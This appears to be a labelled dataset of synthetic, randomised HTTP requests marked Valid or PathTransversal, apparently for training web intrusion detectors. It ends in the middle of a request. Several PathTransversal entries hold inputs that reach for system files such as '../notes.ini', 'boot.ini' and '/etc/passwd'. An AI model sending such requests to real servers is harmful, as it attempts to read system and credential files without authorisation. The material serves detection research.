GET /h6updateU@/cZL9fliV8.QL5Xaatja/tfnseprete8anlg/73/ieeeqyenz/fzCrryiKQHC9kNG/ZSNtx29Xe/iiNfm1eYgKn8qB66jY6/ANAADHr/a@z43795sHVBdrtgBQ/R6/DLoteo.tiff?sdr=6775386&stdin.R2C_OP=yda9f&reigxFTneM=arWs24W7o&E_CQMR=documentuxopt30%3CtoiU&uon2nptdsuo=437563&jpysa=cX7VOu_PW&PH-FDEaccess_logc=stmpbtened+wp-havinga&otels06gtRna=o%3A%5C&s7umnis6et=2728&txeeaQm0mur=a-_qPk&etcaag93=nodetqolNoerincludeas&IxhE4=dci&passwd0dKYperlbetween_Kd=1&rraeely=s5h9it2l&LeF8Zx5uW=%2Fn%2Fmb3atnt HTTP/1.0
Host: 141.39.64.9
Connection: close
Accept: audio/*, audio/*;q=0.9, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 87.204.53.134
Cookie: fT64czfG=fe tbbetweennfr;deoJ2OPvatcGt8e=8790031;etet=esX8t3X;dslmeamBssifb=xiiohfcrmelg3tg;n3ergno=jyn
Cookie2: $Version="66"
Date: Sat, 21 Feb 09 03:54:58 UTC
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: 100-continue
From: d42jdts@rdcne9nyAn.org
If-Modified-Since: Wed, 28 Apr 10 18:18:27 GMT
If-Unmodified-Since: Sat, 14 Jul 07 08:00:17 CET
If-Match: *
If-None-Match: "txjEsTrDPvfai@I@."
If-Range: Wed, 21 Jul 04 12:05:24 UTC
Max-Forwards: 28
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: snrqoV s1ss=Benjeh4e
Authorization: Digest opaque="wir1ntt"
Range: -3,-7138
Referer: /lodi.fgf
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.3 (Windows; U; Windows NT 2.8; 1a-Ze; rv:4.0.3) Gecko/99124828
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: uiS9e/6.0 www.aeeohhW.html, i7ktml/1.7 177.192.255.158
Transfer-Encoding: deflate
Upgrade: 0tfui/2.9, esnct/9.2, find4/9.4
Warning: 527 www.Lwsnus0.gif "ereraxi" 
X-Forwarded-For: 231.230.155.168
X-Serial-Number: 23409980
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13960
Start - Id: 13977
class: Valid
GET /ihQzC-vJ_t/eb0orl2nilsiz0weqnhi/eWd-VtaKN8d/nieafw9ueece/ioUvJxuKvez/awssoa.gif?enu=3la14t41frsarn0r&jnleH=26592&5nqeilr=mtyA&GG2QpW345A=41541135 HTTP/1.1
Host: 0.185.116.244
Connection: keep-alive
Accept: application/*, video/*, text/plain
Accept-Charset: iso-2022-kr;q=0.6, macintosh;q=0.6, utf-7, us-ascii, euc-cn
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 24.226.3.114
Cookie: ttk=:x
Cookie2: $Version="42"
Date: Thu, 21 Apr 05 08:06:59 UTC
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: 2uae4Rs
From: sTsgewns@snfh4s.it
If-Modified-Since: Fri, 20 May 05 08:29:51 GMT
If-Unmodified-Since: Mon, 23 Feb 09 19:27:10 UTC
If-Match: *
If-None-Match: "74sd4VC5IMRbtkcgV"
If-Range: ".IPKjer5XO2NbZz"
Max-Forwards: 942
MIME-Version: 9.0
Pragma: axs=dmnAbh
Proxy-Authorization: NTLM dGliYmVwYU1oZXN6NXJlbkRvb2ZlYTh0aW5PcjFSZW9lbmJsZQ==
Authorization: Digest response="0EbEB0dD97E15B80Ac1ED7b9D4BDf79C"
Range: -895005
Referer: /otst.msf
TE: deflate;q=0.4,gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.9 (X11; U; SunOS sun4u 0.2; ef-mr; rv:2.6.8) Gecko/66140219
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: 7.4 www.iiqenF3S.css:9776
Transfer-Encoding: compress
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 331 169.34.182.93:52 "segnerwEd" 
X-Forwarded-For: 90.110.72.221
X-Serial-Number: 738264285065396
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13977
Start - Id: 6286
class: Valid
POST /a3dB1Z_/nAYQg/3gJeekan5opw5tOfnr/WlpF4eo77/6OS7k.nsf? HTTP/1.0
Content-Length: 55
Content-Language: oncl3en,k,ice9si
Content-Encoding: gzip
Content-Location: /Ctlqi/dtoy/eTtcoh.txt
Content-MD5: bEl0RXRzd2FlZW55QzFhSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Jul 08 07:56:44 UTC
Last-Modified: Sat, 20 Jan 07 24:29:36 UTC
Host: www.ddcFi.be:65
Connection: keep-alive
Accept: video/*
Accept-Charset: us-ascii;q=0.9, euc-tw;q=0.8
Accept-Encoding: compress, gzip
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 85.58.53.162
Cookie: esnN9n=155427734;OfZTshutdown=qWJYeugi;onmtyonl5srn15=3;@W06=eth5wj88n
Cookie2: $Version="5"
Date: Wed, 09 Jan 08 12:51:32 GMT
ETag: W/"@c68p_R1HCDtNdj4k0jx"
Expect: 4aeBlD=inoanbD
From: ueos@tseotr.biz
If-Modified-Since: Mon, 07 Apr 08 14:52:39 CET
If-Unmodified-Since: Wed, 26 Jan 05 15:03:07 CET
If-Match: "fyC7VF7wLrBC3MvRI"
If-None-Match: "30xjv4TI_f8hcK02nXX"
If-Range: *
Max-Forwards: 9570
MIME-Version: 9.1
Pragma: lISie52a='1e'
Proxy-Authorization: Basic ZGlpcm1uc3Q6eG5zaGxtaA==
Authorization: NTLM VGZJaTQ0cmU2enJ0S2MybHNpbmNnemFhb3RybmhFUmVadW96dXNTMHRlbmhzY3N3
Range: 10-,-849357
Referer: http://www.amo0etrr.ch/e1tT/thrmNur/svdrf.aspx
TE: deflate,chunked;q=0.7
Trailer: From
User-Agent: cnNhgAie (ahv.8YJhv)
UA-CPU: Sparc
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 6564x871
Via: FTP/3.3 www.atamup.js:35
Transfer-Encoding: compress
Upgrade: esochH/3.1, ehsqp/5.4, atmg/1.6, Aulr/8.6
Warning: 097 84.156.203.77 "rilteriyvagst2t" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 4610703908
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iuoq2s3ec=s1ybueNNdA&rsosmrnhy4=7248&tnnas=dRskQqi3ObFK

End - Id: 6286
Start - Id: 19410
class: Valid
GET /l1c/ahrfzuTrteynPrzeih/o9LY_SY00Xla-Wl/natr/2d/nXmyoyaGvQdIassv6xl/hmahhtoib/h76Yn/piwoeg3osE2rrowny.css? HTTP/1.1
Host: 132.143.46.153
Connection: keep-alive
Accept: video/*, video/quicktime;q=0.3, video/*;q=0.5
Accept-Charset: euc-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 171.196.246.32
Cookie: .xrmFfDN=595613;8hg5eyos=ie+;Gq09insert9m=?oee;pn0peter=sw;i5a=3tdrb o;qUPK1YxtermxmlJVxD=27125
Cookie2: $Version="3"
Date: Sun, 19 Dec 04 19:12:01 CET
ETag: "4fBtkGnN1iC7-i7nSOa"
Expect: Aayeaeu
From: unsxob@wuKtvh6Lni.com
If-Modified-Since: Sat, 25 Aug 07 15:35:38 CET
If-Unmodified-Since: Sun, 18 Jan 04 14:52:44 GMT
If-Match: *
If-None-Match: *
If-Range: "ZIy1-ItIGO9EtetC3."
Max-Forwards: 0
MIME-Version: 8.3
Pragma: eea=tge3
Proxy-Authorization: Digest nc=a68EDdAa
Authorization: qolhw rtei=entcei
Range: -6815,05-
Referer: /ear1Dq6.jsp
TE: chunked
Trailer: Expect
User-Agent: Mozilla/2.6 (compatible; rthova4e; Mac OS X; mbmeIhnbs; iaetatekh)
UA-CPU: x86
UA-Disp: 818,3466,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6070x723
Via: HTTP/8.7 30.147.187.250, 3.9 40.81.18.151:59949
Transfer-Encoding: Oddi
Upgrade: 3tDr/0.3, octa/6.4
Warning: 004 www.i7gBe.tiff "ie1rvnye5ht" 
X-Forwarded-For: 72.140.87.177
X-Serial-Number: 55136594
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 19410
Start - Id: 45052
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.0
Host: www.aquifhiiEv.cz
Connection: nooe
Accept: audio/x-wav;q=0.9, image/png;q=0.7, audio/basic
Accept-Charset: euc-tw;q=0.6, x-mac-arabic;q=0.8, us-ascii
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: foth=wesa9if
Client-ip: 69.142.236.19
Cookie: meicteezn7e=1091798;p9hEogta=04833025;fqADFy3viH=32934;XtjtMMB7wmeta3=c;sbann=061535;eaenYNa=Iatoalcioriire
Cookie2: $Version="8"
Date: Thu, 18 Mar 10 07:55:29 UTC
ETag: W/"tEDzViflK5b0IYZZ"
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 14 Jul 08 20:42:00 CET
Max-Forwards: 774
Pragma: no-cache
Authorization: NTLM cnpvczh0amN6ZTdlOWFlVGlyb3NEYWRlbGVoaFppeTIwZQ==
Range: -6543,-6,-30
Referer: http://www.ewOceha.gov/H3ncts.txt
Trailer: Host
User-Agent: wL1ott
UA-CPU: MIPS
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Transfer-Encoding: gzip
Upgrade: sLa/4.9
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 23020199164875
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45052
Start - Id: 10485
class: Valid
GET /uiN43SsEhhH4J9qN.AGl/hnVq8xL/ttqrpBvLVGl1DSHxu/eWmesT56@5HYM/IQfmYB/8OB/OudocumentP7.css?erhwr=n4U&Not8s6h=%26u&lboot.inifTZRW=496132&noaf=%3B&FwgetO4N=opduniongaa%2B&am0lIa=tyotyovsls&tfredonan=dt&teNr8dc=9 HTTP/1.0
Host: www.Ltttn.it
Connection: close
Accept: application/rtf;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uohet8-tei7whop, xaHh-ap;q=0.5, 3aa-zvoie
Cache-Control: min-fresh=315
Client-ip: 231.129.12.56
Cookie: .FS8gSR2r=oeI5hph~dsene;otjw0hb=117;YZzAhf=61;blruhvcv=rsYiC1nrBlugnlr
Cookie2: $Version="130"
Date: Sun, 26 Mar 06 04:55:08 GMT
ETag: W/"PmI.NSLS9F8@CFmne2vP"
Expect: uees
From: Tntn@cwaeo7.gov
If-Modified-Since: Tue, 04 Sep 07 22:55:19 GMT
If-Unmodified-Since: Sun, 22 Jun 08 17:38:33 GMT
If-Match: *
If-None-Match: "TdZHNhvwFpp5fhMyHvQu"
If-Range: *
Max-Forwards: 276
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="os85ul"
Authorization: Basic aUF5bnI6ZnVuZG8y
Range: -19441,204-
Referer: /okrlsa/o8hntoDn.wmn
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: Mozilla/8.7 (X11; U; Unix 6.0; su-oe; rv:6.1.2) Gecko/27163016
UA-CPU: StrongARM
UA-Disp: 635,287,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9550x605
Via: 7.1 192.91.160.81, FTP/4.1 www.onanr6r.gif
Transfer-Encoding: gzip
Upgrade: hpr/1.7, 2wn/2.6, lso/0.7
Warning: 147 www.lrc3.js "UititoIleOediu0h" 
X-Forwarded-For: 123.125.206.4
X-Serial-Number: 2186301943746679
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10485
Start - Id: 14953
class: Valid
GET /tee4tdjTe/1rlRYCdKvW/xg7cYHG/oiV/ubOX-Rzqe6Jzk0Q/a6wcT1Ymf4bM8uhsr/obu/h5ektiemwmewn6n/8nlh7uya1uQelshertoa/sxHoYIr.nsf?Fkzddpdaimdfsj=l00&w8nre7=zVA&U-SXN-=ufyrnjayhaebktq&eOesrsaot2hhRgt=eTHM7AE&eimrakc=p%24ioa HTTP/1.0
Host: www.rrsotxptt.ch
Connection: close
Accept: */*
Accept-Charset: ks_c_5601-1987, koi8-r, gb2312;q=0.5, x-mac-icelandic
Accept-Encoding: gzip;q=0.2, compress;q=0.1, gzip;q=0.5
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 10.19.142.215
Cookie: bmVdeleten=4teo|;VMbaRpGEa@Yo=5;iyrunat=4tmpima
Cookie2: $Version="3"
Date: Fri, 25 Aug 06 19:42:26 GMT
ETag: W/"CQt5GewDPb5sPFSX6ofB"
Expect: itas6ore=onoSer5;nndt2=mnVjam
From: aedi@nirdf.net
If-Modified-Since: Sat, 18 Apr 09 14:52:51 CET
If-Unmodified-Since: Sun, 04 Mar 07 04:14:30 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 22:57:28 UTC
Max-Forwards: 53
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic cmV0czpzZG51ZXRs
Authorization: Basic YTRobGV1Yjk6bjl4dE5lYQ==
Range: 06-233058
Referer: /Fnmanjsr.tiff
TE: trailers,gzip;q=0.1,gzip;q=0.6
Trailer: Cache-Control
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 2.6; 4t-e9; rv:6.4.7) Gecko/73957218
UA-CPU: PowerPC
UA-Disp: 2597,7674,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8266x800
Via: 2.6 28.99.38.171
Transfer-Encoding: identity
Upgrade: 6rnez3/1.7, ane/0.4, ioia/7.2, nnR/1.8, 7mdu/9.8
Warning: 436 73.117.227.57:6 "thodictf5aXh1rett" "Sun, 19 Apr 09 22:34:03 UTC"
X-Forwarded-For: 120.240.133.60
X-Serial-Number: 51313390873628125654
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14953
Start - Id: 44902
class: PathTransversal
GET /e@/iframe78J6XBNsamvarr9selectb/19._LC@VugraX/sFaZf4avZ-PXg/tywNidhnEnuouardcaS/5g/ooCyDf9qX_UPM/sasIylre/s.622TOdYruA/utanA9G.sh?ogeeeprsn=255&tthpt8o=sed%3C%3Fnrai%3ENandbhsadl&dbt6hea=46&tttt=2&.OF035=file%3A%2F%2F%2Fh%3A%2Fod%2Feegsh%2Fqtb.xml&mtewPua3I=33 HTTP/1.1
Host: www.bTonSr5s.uk:80
Connection: close
Accept: video/*;q=0.2, application/postscript, text/*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.4, gzip, gzip;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="171"
Date: Wed, 23 Mar 05 05:49:20 CET
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: s0deb=TEis;b9a59a
From: ossdo1d@eovryuBei.be
If-Modified-Since: Wed, 09 Dec 09 18:38:42 UTC
If-Unmodified-Since: Fri, 01 Jun 07 10:54:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4939
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic V3NFU2lwY2w6ZWF5YTRs
Range: 78821-,-584,26-7
Referer: /avoidof/ndtO.avi
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 2.6; ee-tS; rv:6.7.1) Gecko/49833617
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6797x3315
Via: HTTP/4.3 116.247.21.28, Enh/6.9 21.51.91.144, 7.1 111.79.44.35:3302
Transfer-Encoding: znxu
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 600 135.61.40.75 "toa8hm6a" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44902
Start - Id: 30351
class: Valid
GET /75IeHOtAiEi-639PpP7U.tiff?bH46=1qg HTTP/1.0
Host: www.oskwi.be
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.2, ks_c_5601-1987, x-mac-arabic;q=0.8, iso-8859-1
Accept-Encoding: *;q=0.9
Accept-Language: ctpaA-oe, eaweTtf-httxUw;q=0.0, e9Uycdfo-eb
Cache-Control: no-cache
Client-ip: 46.149.252.32
Cookie: jeZlUNd=r~t
Cookie2: $Version="3"
Date: Sun, 14 Nov 04 22:03:58 CET
ETag: "DbXbF.n5nws-Sqt1ttB4"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Wed, 11 Oct 06 24:19:28 GMT
If-Unmodified-Since: Wed, 31 May 06 11:36:28 CET
If-Match: *
If-None-Match: "exr7G9305CUYpaWU"
If-Range: Fri, 18 Nov 05 18:14:01 CET
Max-Forwards: 392
MIME-Version: 1.3
Pragma: ladegi=oet6e
Proxy-Authorization: Basic MmZ0bGxjOnBpaXNv
Authorization: Basic U2h1aHc6cHJoRXdlZXM=
Range: 05745-,56-61
Referer: /5atud1/s7isq.mp3
TE: trailers,gzip;q=0.0,gzip;q=0.0
Trailer: Host
User-Agent: ddIenq (svQ@Z6; ith1xyLz; eq2uiCK4)
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 0.1 13.100.108.77, 5.9 www.airan.gif, FTP/1.1 151.96.205.88
Transfer-Encoding: deflate
Upgrade: anxrdn/9.4, nRovoy/2.5, p6aym/9.5, 6rc/8.0, nAhe/8.8
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 123.135.81.190
X-Serial-Number: 4261996881393
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30351
Start - Id: 46384
class: PathTransversal
GET /wftsetes/noak/ljJgMhC.GL-a4/maisstemeerkwnnho/R_x7Hi3eR5p/tvGgfOcsdc/mnuotoetehwsrHTbNot/etchnph-/i4X9/9aeIdiia73dftr.htm?leU=lerieMe&HSSKEReCeK=boot.ini&g3lld9iyocsais=%2Fetc%2Fpasswd&mTenihrNoroina=BcpL1 HTTP/1.1
Host: www.roedoazak.gov
Connection: nlet
Accept: */*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: sromrr6-lva, 9y-kr2a9Au
Cache-Control: max-stale
Client-ip: 230.204.6.13
Cookie: Hsomh6btjsutS=f3B;tl5spfhalhenase=4window.openEa;nrzn=etalhrqlrmtm;as_pOYB6vincludeM=uk5PwE6NjrR;egegoenn=0ddoqrsf;X8lchildfounionJj=childnp
Cookie2: $Version="1"
Date: Sat, 22 Nov 08 23:20:57 CET
ETag: "ql0484w1O30JHkv1kQE7"
Expect: 100-continue
From: cewts@1fgr.fr
If-Modified-Since: Wed, 14 Jan 09 02:36:54 UTC
If-Unmodified-Since: Sat, 13 Jun 09 19:56:24 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: *
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 8922
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: hdes nflr9u=Tyswralt
Authorization: NTLM b3N2Y21yaFM3bnlsZmZzbGVpWU50aWVlaHJ1b2gwMWVJYTA=
Range: 2-1818,846125-
Referer: /rao6.shtml
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: latlb/9.1.0
UA-CPU: MIPS
UA-Disp: 4968,8587,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3216x516
Via: 3.5 176.191.74.65:2838, uod/4.7 217.215.74.199
Transfer-Encoding: identity
Upgrade: EutP9q/0.0, tvoa/2.5, adr7m/4.2, mmn/1.2, egg2x/1.5
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46384
Start - Id: 29826
class: Valid
GET /dTetscwescti/44tc/luVigE.hkiO3kDhg/eIuZTl0yexZr5f.tiff?tycni6=1838&orwagOnxn=rkJ23GVdgy&2vOh4B3RI=esases&4cAJ1JR=tnujSih%5DbetOinxm&nodc9isppl=357021&tts=t++noli+b%3Dn&3eoi=86908&uoT=7ded%25u%5DNdnselhoapsse%29&jS=tbotZmnsipejmtld HTTP/1.1
Host: 130.196.120.210
Connection: keep-alive
Accept: text/*;q=0.4, audio/*;q=0.7
Accept-Charset: windows-1251;q=0.6, iso-8859-2;q=0.2, x-mac-roman;q=0.0
Accept-Encoding: *
Accept-Language: ot-c, awns-p
Cache-Control: no-transform
Client-ip: 64.126.244.88
Cookie: ohbwbcea2s6eN=847
Cookie2: $Version="7"
Date: Thu, 10 Sep 09 20:37:33 GMT
ETag: "0AVT7Fy1MSqi0kB"
Expect: yiie7bb
From: piihht@ohiilnlrs.biz
If-Modified-Since: Thu, 24 Dec 09 17:21:58 GMT
If-Unmodified-Since: Fri, 04 May 07 13:56:59 GMT
If-Match: *
If-None-Match: *
If-Range: "QmuGZqFcHY0Vh_A"
Max-Forwards: 4579
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="iebwoe"
Authorization: Basic bDFuSWJodU86OW40eW1u
Range: 9669-56204,57635-,19451-
Referer: /eptr/7ltthri/eliew1/hhncYQIv.mpeg
TE: deflate,trailers,chunked
Trailer: Expect
User-Agent: chSSW@7d http://www.il4ahic.fr
UA-CPU: 68000
UA-Disp: 793,154,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 238x9907
Via: anmstt/3.0 www.5noeoue.tiff, FTP/3.3 25.143.199.67
Transfer-Encoding: gzip
Upgrade: eao/6.7, qpa/6.7
Warning: 757 171.183.186.152:6 "lkOups" 
X-Forwarded-For: 22.79.136.228
X-Serial-Number: 211553371251
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 29826
Start - Id: 19015
class: Valid
GET /otnIp9gR/1TOb1/bc3eAwg.js?ErqriaeytuDlf=oRsvgees+a&i3ltzru=i&ao3eAatiowjeCr=e%26eg%5Bilib%7Edipae&lu7t=hdsautoexec&aaonhwfTi=ak3o&.Y0eaEunionnLyadmin@=aopbcohyma&sODiO=ajfjPD&T3i=722588&ass=%3Fmnzj+niM+qv%24iI HTTP/1.1
Host: www.hBeacroes.de:0
Connection: keep-alive
Accept: application/*, application/*, image/*
Accept-Charset: us-ascii;q=0.0, iso-8859-7, us-ascii;q=0.0, big5;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=61
Client-ip: 50.43.73.250
Cookie: rac3exafu7Ea9=eq:yd4 ndamNanA;cya2u=dS_7tn;EKgu=0909830;bat5rdoe=lemIe:;awrcsqro=73950864;teReK==kccwslPuR
Cookie2: $Version="62"
Date: Mon, 23 Feb 09 23:18:21 GMT
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: Priuift@eiTp29Uz.ch
If-Modified-Since: Thu, 19 Jan 06 22:07:01 CET
If-Unmodified-Since: Wed, 14 Jan 04 24:37:41 GMT
If-Match: "sAKLid4RfUVItOwj"
If-None-Match: "EUUtRwKgJ-lgqQ9jCO"
If-Range: Wed, 27 Aug 08 07:57:47 UTC
Max-Forwards: 4518
MIME-Version: 8.1
Pragma: ldezo=mH
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5-sess
Range: 002-0467,62-
Referer: /nafChO/bcEeeu/r7rtnm/AAEwnah.mdb
TE: gzip
Trailer: User-Agent
User-Agent: DRtdepod (sQNosCC3r; 29IfEc; oLkSxBqY)
UA-CPU: MIPS
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: 7.1 181.95.186.60, FTP/2.4 www.oszd9iAS.shtml, teNxvo/0.9 www.ianri.png
Transfer-Encoding: gzip
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19015
Start - Id: 2463
class: Valid
GET /rMe/hfzDI-jv9N0O.bin? HTTP/1.0
Host: www.ielt.gov
Connection: close
Accept: */*
Accept-Charset: iso-8859-5, us-ascii;q=0.4, x-mac-chinesesimp, iso-8859-9;q=0.8, cp-932
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=75
Client-ip: 65.8.54.25
Cookie: 78tHa9toss=sZu4Wi3vhV.;awyh8geaRps4=avbscripti r
Cookie2: $Version="9"
Date: Sun, 18 Jun 06 20:47:44 GMT
ETag: W/"CuRD6g@yvVRM9TXyO"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Sat, 24 Dec 05 02:09:19 CET
If-Unmodified-Since: Tue, 07 Feb 06 06:26:17 GMT
If-Match: *
If-None-Match: "E5BIrsmT8PXzzItjU1.Z"
If-Range: *
Max-Forwards: 23
MIME-Version: 6.6
Pragma: C='eInUnacm'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: 3diNt oIinu=eeeh
Range: 87817-,2898-
Referer: http://onsu0o.it/tfe6w/orlrsYaf/asumt/iyal.gif
TE: chunked;q=0.9,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.8 (X11; U; Linux i586 2.0; ae-xi; rv:9.2.2) Gecko/70888169
UA-CPU: x86
UA-Disp: 4040,6167,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 900x5240
Via: 7.8 119.145.224.200:87611, FTP/1.5 158.217.237.245
Transfer-Encoding: compress
Upgrade: het/6.2, sieoe/9.6, Le0At/2.4, ooX/2.2
Warning: 552 www.tsng.jpg:1 "tsmt879qcdlEstelgpx" "Wed, 23 Nov 05 20:06:09 UTC"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2463
Start - Id: 11238
class: Valid
GET /e0a_W8u20b/nxx1362hCUbbvh7.uK/2EUe.Tqj8WRVv/uor/nCi.jpeg?y6lvNpZ=h3&u5nr=88348720&istleunn2n=e0E0U6lr1N&b6iwafsadnig=hn HTTP/1.0
Host: www.bzitdTwko.st
Connection: keep-alive
Accept: image/*;q=0.0, audio/*, text/plain;q=0.8
Accept-Charset: windows-1251, euc-tw, windows-1254;q=0.0, iso-8859-7, windows-1253;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 206.95.167.126
Cookie: 3WmlognsOT=61237
Cookie2: $Version="93"
Date: Wed, 03 May 06 16:42:59 GMT
ETag: "JxNDrd31l4mBTc0A"
Expect: ntBEeso
From: aarli@mLmeltu.be
If-Modified-Since: Wed, 29 Apr 09 08:07:07 CET
If-Unmodified-Since: Sat, 05 Apr 08 19:30:50 CET
If-Match: "1mrCgbwnF0bugrY1pC"
If-None-Match: *
If-Range: *
Max-Forwards: 62
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: bAGo Oiw9tsc=oisdaoot
Authorization: Basic dGVvZTpvbFRoaGY4YQ==
Range: 04605-
Referer: /tjosxq/isVL.html
TE: trailers,trailers,gzip;q=0.5
Trailer: If-None-Match
User-Agent: u-DsL8 http://www.xhse.de
UA-CPU: PowerPC
UA-Disp: 0891,725,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 898x128
Via: 3.2 50.162.126.178, 7.2 91.175.6.47:2, 5.5 www.eJ5sa.html
Transfer-Encoding: compress
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 175.7.223.209
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11238
Start - Id: 31367
class: Valid
GET /wlsNDzfbodyTPUsystemJ/rtsdn3ltoIa/ah/stdinbetweeneGo8qhXdHB/mq4nBfoOpXX.mspx?6tg9bEees=10&bewjtfd7isrid=tLhShlAqsboptepe&swaso8e2Mr=tn HTTP/1.0
Host: www.rlfh.de:37087
Connection: close
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: identity, gzip
